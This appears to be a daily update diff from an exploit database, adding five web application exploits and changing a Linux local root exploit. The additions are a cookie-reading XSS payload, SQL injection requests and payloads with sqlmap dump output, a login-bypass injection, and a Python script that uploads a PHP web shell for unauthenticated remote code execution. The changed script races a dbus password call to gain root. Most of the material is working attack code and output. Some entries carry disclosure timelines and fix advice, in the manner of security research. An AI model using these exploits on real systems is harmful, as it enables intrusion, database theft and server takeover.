DB: 2021-06-24

6 changes to exploits/shellcodes

WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection
Online Library Management System 1.0 - 'Search' SQL Injection
Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)
Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)

exploits/linux/local/50011.sh

@@ -58,14 +58,19 @@ else
 fi
 
 # Add the password to /etc/shadow
-echo "[*] Adding password to /etc/shadow"
-x=0
-while [ $x -lt 100 ]
+# Sleep added to ensure there is enough of a delay between timestamp checks
+echo "[*] Adding password to /etc/shadow and enabling user"
+sleep 1
+currentTimestamp=$(stat -c %Z /etc/shadow)
+fileChanged="n"
+while [ $fileChanged == "n" ]
 do 
     dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
-    x=$(($x + 1))
+	if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then
+	    fileChanged="y"
+	    echo "[*] Exploit complete!"
+	fi
 done
 
-echo "[*] Exploit complete! If the password does not work, run the exploit again"
 echo ""
 echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"

exploits/php/webapps/50051.txt

@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
+# Date: 22/6/2021
+# Exploit Author: Mohammed Adam
+# Vendor Homepage: https://www.wpgmaps.com/
+# Software Link: https://wordpress.org/plugins/wp-google-maps/
+# Version: 5.7.2
+# Tested on: Windows 10
+# CVE: CVE-2021-24383
+# References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954
+
+*Proof of Concept*
+
+*Steps to Reproduce:*
+
+1) Edit a map (e.g
+/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)
+
+2) Change Map Name to <script>alert(document.cookie)</script>
+
+3) Save the Map
+
+4) Stored XSS will be triggered when viewing the Map List
+(/wp-admin/admin.php?page=wp-google-maps-menu)

exploits/php/webapps/50052.txt

@@ -0,0 +1,179 @@
+# Exploit Title: WordPress Plugin Poll, Survey, Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection
+# Date: 09/06/2021
+# Exploit Author: inspired - Toby Jackson
+# Blog Post: https://in-spired.xyz/wpdevart-polls-blind-sql-injection/
+# Vendor Homepage: https://wpdevart.com/wordpress-polls-plugin
+# Software Link: https://en-gb.wordpress.org/plugins/polls-widget/
+# Version: Tested on version 1.5.0 and 1.5.2 (Older versions may be affected)
+# Tested on: WordPress
+
+
+## I. Vulnerability
+
+Blind SQL Injection
+
+## II. Product Overview
+
+The software allows users to quickly generate polls and voting system and displays the results in real time.
+
+## III. Exploit 
+
+A vulnerability has been discovered in the wpdevart wordpress plugin "Poll, Survey, Questionnaire and Voting system" version 1.5.0 and 1.5.2. It is possible to perform a blind SQL injection on the date_answers[] parameter when casting a vote. This can be used to dump the back end database. Version 1.5.2 requires the changing of headers using an appropriate method for spoofing an IP address, such as X-Forwarded-For.
+
+## IV. Vulnerable Code 
+
+The vulnerable code resides in the front_end.php page within the save_poll_in_databese() function. It takes the $question_id and $current_user_ip before storing the vote in a variable called $new_voted_array, as seen below, from the date_answers post parameter.
+
+
+$new_voted_array=$_POST['date_answers'];
+
+The array is then looped through and the $new_answer variable is used as part of the where query without being sanitized.
+
+if($new_voted_array)
+	foreach($new_voted_array as $new_answer)	{
+		$wpdb->query('UPDATE '.$wpdb->prefix.'polls SET vote = vote+1 WHERE `question_id` = '.$question_id.' AND `answer_name` = '.$new_answer.'');		
+
+
+
+The above code is fixed in version 1.5.1, but there remains a vulnerability in 1.5.1 and 1.5.2. When a user is voting for the first time, the vote is cast in a different statement that also does not get sanitized. Coupled with the fact the application uses user-controlled headers to determine whether a user has voted already, an attacker can just edit their origin IP with an X-Forwarded-For header to vote multiple times but also invoke the SQL Injection still.
+
+if ($new_voted_array)
+	foreach ($new_voted_array as $answer) {
+		$wpdb->query('UPDATE ' . $wpdb->prefix . 'polls SET vote = vote+1 WHERE `question_id` = ' . $question_id . ' AND `answer_name` = ' . $answer . '');
+	}
+
+
+## IV. Proof of Concept
+
+A typical vote, intercepted with burp, will look like the request below. Editing this to contain a sleep will cause the server to sleep for X period.
+
+------
+POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 67
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/blog/index.php/2021/06/09/research/
+Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
+
+question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=sleep(10)
+------
+
+
+Utilizing this, the database can easily be dumped by capturing the request, with an interceptor such as burpsuite, and using sqlmap.  By placing a * at the required injection point, sqlmap will first test this location.
+
+------
+POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 67
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/blog/index.php/2021/06/09/research/
+Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
+
+question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=*
+------
+
+
+Save this request to a file, request.txt, and run the tool.
+
+------
+sqlmap -r request.txt --dbms=mysql --dbs --level=5 --risk=3
+
+[14:30:54] [INFO] testing MySQL
+[14:30:54] [INFO] confirming MySQL
+[14:30:54] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian
+web application technology: Apache 2.4.46
+back-end DBMS: MySQL >= 8.0.0
+[14:30:54] [INFO] fetching database names
+[14:30:54] [INFO] fetching number of databases
+[14:30:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
+[14:30:54] [INFO] retrieved: 2
+[14:30:54] [INFO] resumed: information_schema
+[14:30:54] [INFO] resumed: wordpress
+available databases [2]:
+[*] information_schema
+[*] wordpress
+------
+
+------
+sqlmap -r request.txt --dbms=mysql -D wordpress --tables --level=5 --risk=3
+
+Database: wordpress
+[19 tables]
++-----------------------+
+| wp_commentmeta        |
+| wp_comments           |
+| wp_democracy_a        |
+| wp_democracy_log      |
+| wp_democracy_q        |
+| wp_links              |
+| wp_options            |
+| wp_polls              |
+| wp_polls_question     |
+| wp_polls_templates    |
+| wp_polls_users        |
+| wp_postmeta           |
+| wp_posts              |
+| wp_term_relationships |
+| wp_term_taxonomy      |
+| wp_termmeta           |
+| wp_terms              |
+| wp_usermeta           |
+| wp_users              |
++-----------------------+
+------
+
+
+https://www.youtube.com/watch?v=Fj1zeXNxDYQ
+
+In versions 1.5.1 and 1.5.2, this vulnerability only occurs on the first vote a user casts. Adding a random X-Forwarded-For header to the requests will allow for the attack to be repeated as described above.
+
+This has been demonstrated in the following PoC.
+
+https://www.youtube.com/watch?v=P1r7gk0DSaM
+
+
+## VI. Impact
+
+An attacker can dump the back-end database of the server and gain access to user credentials which could then be used to perform further malicious acts. If configured incorrectly, it can also lead to the attacker being able to obtain remote code execution on the server.
+
+
+## VII. SYSTEMS AFFECTED
+
+WordPress websites running "Poll, Survey, Questionnaire and Voting system" plugin version 1.5.2 (older versions may also be affected).
+
+
+## VIII. REMEDIATION
+
+The update has been fixed in version 1.5.3, so it is advised to update to this version if using the plugin.
+
+
+## VIIII. DISCLOSURE TIMELINE
+-------------------------
+June 9, 2021 1: Vulnerability identified.
+June 9, 2021 2: Informed developer of the vulnerability.
+June 9, 2021 3: Vendor replied to discuss the vulnerability in more detail.
+June 9, 2021 4: Sent vendor proof of concept and impacted code blocks.
+June 10, 2021 1: Vendor emails to state the vulnerability has been fixed.
+June 10, 2021 2: Confirmed initial fix, vendor happy to disclose the vulnerability.
+June 10, 2021 3: Requested CVE Number.
+June 19, 2021 1: WPScan contact to discuss vulnerability.
+June 19, 2021 2: Confirmed fix is not valid when new user votes or edits headers.
+June 19, 2021 3: Contacted vendor to request further fix.
+June 22, 2021 1: Vendor confirms fix. Information made public.

exploits/php/webapps/50053.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Online Library Management System 1.0 - 'Search' SQL Injection
+# Date: 23-06-2021
+# Exploit Author: Berk Can Geyikci
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
+# Version: 1.0
+# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
+
+#Vulnerable URL: http://localhost/ols/index.php?q={random string} 
+#Search Parameter 
+
+
+Request:
+
+POST /ols/index.php?q=find HTTP/1.1
+Host: localhost
+Content-Length: 16
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/ols/index.php?q=find
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=msjh9j7ngitv8k79g9or1rov0d
+Connection: close
+
+search=a&Search={INJECT HERE}
+
+
+POC 1:
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: search=AA&Search=') AND 5208=5208#
+    Vector: AND [INFERENCE]#
+
+POC 2:
+	Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: search=aa&Search=') OR (SELECT 5630 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(5630=5630,1))),0x717a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XONS
+    Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+POC 3:
+	Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: search=aa&Search=') AND (SELECT 3884 FROM (SELECT(SLEEP(5)))baxK)-- uNHU
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+POC 4:
+	Type: UNION query
+    Title: MySQL UNION query (NULL) - 16 columns
+    Payload: search=aa&Search=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162787171,0x7665436f41665177487458444d6c4358416d6a716869586c476d504b67647178695064414f4e444f,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

exploits/php/webapps/50054.py

@@ -0,0 +1,82 @@
+# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)
+# Date: 23-06-2021
+# Exploit Author: Berk Can Geyikci
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
+# Version: 1.0
+# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
+# Exploit Tested Using: Python 3.8.6
+
+'''
+Steps To Produce:
+1)Click Books
+2)Select one book and click Read more
+3)Get the book id from url #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678
+4)Execute Python Script with URL, Book id and Command
+'''
+
+
+'''
+Import required modules:
+'''
+import sys, hashlib, requests
+import urllib
+import time
+import random
+
+try:
+#settings
+  target_url = sys.argv[1]
+  book_id    = sys.argv[2]
+  command    = sys.argv[3]
+
+except IndexError:
+
+        print("- usage: %s <target> <book_id> <command>" % sys.argv[0])
+        print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv[0])
+        sys.exit()
+
+url = target_url+"/ols/proccess.php?action=add"
+
+session = requests.Session()
+session.get(target_url+"/ols")
+session_cookies = session.cookies
+php_cookie = session.cookies.get_dict()['PHPSESSID'].strip()
+print("Getting Session Cookie= "+php_cookie)
+
+random_borrower_id = random.randint(0,999999)
+
+#Headers to upload php
+headers = {
+    "Accept-Encoding": "gzip, deflate",
+    "Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/",
+    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq",
+    "Upgrade-Insecure-Requests": "1",
+    "Connection": "close",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+    "Cookie": "PHPSESSID="+php_cookie
+}
+
+req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers)
+
+
+data = "------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n15243678\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BorrowerId\"\r\n\r\n"+str(random_borrower_id)+"\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Firstname\"\r\n\r\ndummy_firstname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Lastname\"\r\n\r\ndummy_lastname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"MiddleName\"\r\n\r\ndummy_middlename\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Address\"\r\n\r\ndummy_address\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"optionsRadios\"\r\n\r\nMale\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"ContactNo\"\r\n\r\n1\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"CourseYear\"\r\n\r\n2021\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BUsername\"\r\n\r\ndummy_username\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BPassword\"\r\n\r\ndummy_\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"picture\"; filename=\"rcepoc_"+str(random_borrower_id)+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\n\r\n\r\n\r\necho shell_exec('"+command+"');\r\n\r\n\r\n\r\n?>\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"save\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq--\r\n"
+
+req = requests.post(url, headers=headers, data=data)
+print("Uploading file...")
+
+req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers)
+#print(req.text)
+
+req = requests.get(target_url+"/ols/borrower/", headers=headers)
+#print(req.text)
+
+req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers)
+reqq = req.text
+#print(reqq)
+reqqq = reqq.find(str(random_borrower_id))
+command_result = reqq[reqqq-21:reqqq+10]
+
+req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers)
+print("Command Result = "+req.text)

exploits/php/webapps/50055.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) 
+# Date: 22/06/2021
+# Exploit Author: Rinku Kumar (rinku191)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link:   https://phpgurukul.com/small-crm-php/
+# Version: 3.0
+# Category: Webapps
+# Tested on: Apache2+MariaDB latest version
+# Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.
+
+
+Vulnerable Page: /crm/admin/
+
+POC-Request
+-----------------------------------
+POST /scrm/crm/admin/ HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/scrm/crm/admin/
+Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14
+Upgrade-Insecure-Requests: 1
+
+email='+or+2>1+--+&password=&login=
+
+---------------------------------------
+POC-Response
+
+HTTP/1.1 200 OK
+Date: Tue, 22 Jun 2021 15:53:00 GMT
+Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33
+X-Powered-By: PHP/7.2.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 48
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<script>window.location.href='home.php'</script>

files_exploits.csv

@@ -44198,3 +44198,8 @@ id,file,description,date,author,type,platform,port
 50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,
 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,
 50050,exploits/php/webapps/50050.txt,"Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)",2021-06-22,"Pratik Khalane",webapps,php,
+50051,exploits/php/webapps/50051.txt,"WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)",2021-06-23,"Mohammed Adam",webapps,php,
+50052,exploits/php/webapps/50052.txt,"WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection",2021-06-23,"Toby Jackson",webapps,php,
+50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",2021-06-23,"Berk Can Geyikci",webapps,php,
+50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",2021-06-23,"Berk Can Geyikci",webapps,php,
+50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",2021-06-23,"Rinku Kumar",webapps,php,